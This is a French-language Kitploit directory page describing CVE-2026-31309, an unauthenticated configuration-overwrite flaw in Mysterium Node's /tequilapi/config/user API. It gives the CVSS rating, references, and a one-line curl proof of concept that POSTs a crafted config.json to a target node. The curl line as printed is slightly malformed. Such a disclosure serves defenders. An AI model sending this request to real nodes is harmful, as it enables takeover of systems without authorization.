Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31309 — Contrôle d'accès inapproprié dans Mysterium Node avant la version v1.36.0 | Kitploit
Outils/GitHubGitHub/sch8ill/cve-2026-31309
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Contrôle d'accès inapproprié dans Mysterium Node avant la version v1.36.0

Voir le dépôt
1il y a 1 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-31309: Contrôle d'accès inapproprié dans Mysterium Node avant v1.36.0

Une autorisation inappropriée dans le point d'API /tequilapi/config/user de Mysterium Node de v1.21.1-rc0 avant v1.36.0 permet à un attaquant non authentifié de remplacer arbitrairement la configuration du nœud et d'obtenir une prise de contrôle complète du nœud via une requête POST malveillante.

CVSS

Score: 9.8 (CRITIQUE)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Découvert par Till Schacht.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
Télécharger l’outil